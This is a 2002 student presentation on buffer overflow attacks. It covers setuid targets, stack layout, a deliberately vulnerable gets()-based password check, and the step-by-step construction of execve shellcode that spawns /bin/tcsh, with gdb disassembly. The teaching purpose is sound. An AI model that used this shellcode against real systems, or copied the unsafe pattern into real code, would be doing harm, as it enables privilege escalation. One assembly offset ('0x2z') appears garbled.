Buffer Overflow Attacks

“Execution of Arbitrary Code”

Aparna Bajaj
Amul Shah
CS 6265 - Project Presentation
September 3rd, 2002
 Overview
• Introduction
• Unix Privileges
• Telnet
• Buffer Overflow
• Binary Attack Code
• Summary
• References
December 8, 2021 Buffer Overflow Attacks 2
 Introduction
• Defensive Training
• How to Test?
• Knowledge is Power

December 8, 2021 Buffer Overflow Attacks 3

 Unix Privileges
• Authorization
• File System
[amul@tokyo:~]%ls -ld /net/hc282/amul
drwx--x--x 31 amul stud 4096 Apr 13 12:40 /net/hc282/amul

• Permission Inheritance
[amul@tokyo:~]%ls -l /usr/local/etc/ftpd
-rwxr-xr-x 1 root root 466944 Mar 11 1994
/usr/local/etc/ftpd

• SetUID
[amul@tokyo:~]%ls -l /usr/lib/fs/ufs/quota
-r-sr-xr-x 1 root bin 15260 Oct 6 1998
/usr/lib/fs/ufs/quota

December 8, 2021 Buffer Overflow Attacks 4

 Telnet
Purpose:
– provide a fairly general bi-directional eight-bit byte
oriented communications facility.

– allow a standard method of interfacing terminal devices

and terminal-oriented processes to each other.

– may also be used for terminal-terminal communication

("linking") and process-process communication distributed
computation.

December 8, 2021 Buffer Overflow Attacks 5

 Telnet
• The Threat
[amul@tokyo:~]%telnet tokyo.cc.gatech.edu smtp
Trying 130.207.114.15...
Connected to tokyo.cc.gatech.edu.
Escape character is '^]'.
220 tokyo.cc.gatech.edu ESMTP Sendmail 8.10.2+Sun/8.9.1;
Sun, 14 Apr 2002 19:11:20 -0400 (EDT)

[amul@tokyo:~]%telnet tokyo.cc.gatech.edu ftp

Trying 130.207.114.15...
Connected to tokyo.cc.gatech.edu.
Escape character is '^]'.
220 tokyo FTP server (SunOS 5.7) ready.

December 8, 2021 Buffer Overflow Attacks 6

 Buffer Overflow
• Process Address Space
• Stack Overflow
• Overwriting Memory Structures
• Address Redirection

December 8, 2021 Buffer Overflow Attacks 7

 Process Address Space
Low Address
Text Data BSS Heap Unallocated Memory Stack
High Address

• Text - program instructions

• Data - initialized variables
char name[] = “amul”;
• BSS - static uninitialized variables
static char name[128];
• Heap - dynamically allocated variable data
char *name;
name = (char *) malloc( 128, sizeof( char ));
• Stack - local variables
char name[128];
December 8, 2021 Buffer Overflow Attacks 8
 Stack Overflow
Base Pointer
Low Address Stack
password saved bp Command Line Args
userpassword return uid somePtr Environment Variables
High Address
Stack Pointer
int checkpasswd (int uid, void *somePtr) {
char password[128], userpassword[128];
… load password from password file into userpassword…
gets(password);
…
return (strcmp(password, userpassword) == 0);
}

December 8, 2021 Buffer Overflow Attacks 9

 Overwriting Memory
• Data Overwriting
• Address Overwriting
– Buffer Pointers
– Activation Records
– Long Jump Buffers
– Function Pointers

December 8, 2021 Buffer Overflow Attacks 10

 Redirection
Low Address
Text Data BSS Heap Unallocated Memory Stack

• Guess work!
• All programs have the same starting stack pointer
• Offset ± starting SP
• Addresses are attack specific

December 8, 2021 Buffer Overflow Attacks 11

 Binary Attack Code
/* project_shellcode.c
Amul Shah (amul@cc.gatech.edu)
03.25.2002

This is a pseudo copy of aleph1's [1] attack shellcode

How To Compile (use with gdb):

gcc -ggdb -static project_shellcode.c -o shellcode
*/
#include <stdio.h>
int main ()
{
char *name[2];

name[0] = "/bin/tcsh";
name[1] = 0;
execve(name[0], name, 0);

exit(0);
}

December 8, 2021 Buffer Overflow Attacks 12

 Binary Attack Code
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>: pushl %ebp save the old base pointer
0x8000131 <main+1>: movl %esp,%ebp make the bp point to the sp
0x8000133 <main+3>: subl $0x8,%esp allocate 8 bytes of space for the 2
pointers. subtract from sp because the
stack grows to lower addresses.
0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp) copy the address
of the string into name[0]
0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp) copy null into name[1]
0x8000144 <main+20>: pushl $0x0 push arg 3 to execve onto the stack
0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax
0x8000149 <main+25>: pushl %eax push arg 2 to execve onto the stack
0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax
0x800014d <main+29>: pushl %eax push arg 1 to execve onto the stack
0x800014e <main+30>: call 0x80002bc <__execve> do execve(arg1,arg2,arg3)
0x8000153 <main+35>: addl $0xc,%esp
0x8000156 <main+38>: movl %ebp,%esp
0x8000158 <main+40>: popl %ebp
0x8000159 <main+41>: ret
End of assembler dump.

December 8, 2021 Buffer Overflow Attacks 13

 Binary Attack Code
(gdb) disassemble __execve
Dump of assembler code for function __execve:
standard stack operations cut for brevity
0x80002c0 <__execve+4>: movl $0xb,%eax hex syscall table index for execve
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx copy string address to register
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx copy name[] to register
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx copy NULL to register
0x80002ce <__execve+18>: int $0x80 send interrupt into kernel
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.

December 8, 2021 Buffer Overflow Attacks 14

 Binary Attack Code
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1,%eax copy syscall table index for exit
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx copy 0 into ebx. used exit(0)
0x8000358 <_exit+12>: int $0x80 send interrupt into kernel
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.

December 8, 2021 Buffer Overflow Attacks 15

 Binary Attack Code
1. Have the string “/bin/tcsh” in movl str_addr,str_addr_addr
memory movb $0x0,null_byte_addr
2. Place a null in memory after the movl $0x0,null_addr
string movl $0xb,%eax
3. Copy 0xb into %eax movl str_addr,%ebx
4. Copy address of the pointer to leal str_addr_addr,%ecx
string into %ebx
leal null_string,%edx
5. Copy address of string into %ecx int $0x80
6. Copy NULL into %edx movl $0x1, %eax
7. Send interrupt 0x80 instruction movl $0x0, %ebx
8. Copy 0x1 into %eax int $0x80
9. Copy 0x0 into %ebx .string “/bin/tcsh”
10. Send interrupt 0x80 instruction

December 8, 2021 Buffer Overflow Attacks 16

 Binary Attack Code
jmp 0x2z # 3 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes Low Address
movb $0x0,0x7(%esi) # 4 bytes Array
movl $0x0,0xc(%esi) # 7 bytes Position 0
movl $0xb,%eax # 5 bytes code
movl %esi,%ebx # 2 bytes
is read
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string “/bin/tcsh” # 8 bytes High Address

December 8, 2021 Buffer Overflow Attacks 17

 Summary
• What makes an application a good target
– Privileges
– Point of Access
• How to initiate a buffer overflow to do
something meaningful
– Stack Smashing Attack
• How to create binary attack code

December 8, 2021 Buffer Overflow Attacks 18

 References
WebSites
• Phrack e-Zine www.phrack.org
• BugTraq Archives hosted at www.geek-girl.com/bugtraq/
• nsfsecurity.pr.erau.edu
Canonical Resources
• “Aleph One.” Smashing The Stack For Fun And Profit.
Phrack, 14(49), November 1996
• Matt Conover and w00w00 Security Team. w00w00 on
Heap Overflows. http://www.w00w00.org/articles.html,
January 1999.
December 8, 2021 Buffer Overflow Attacks 19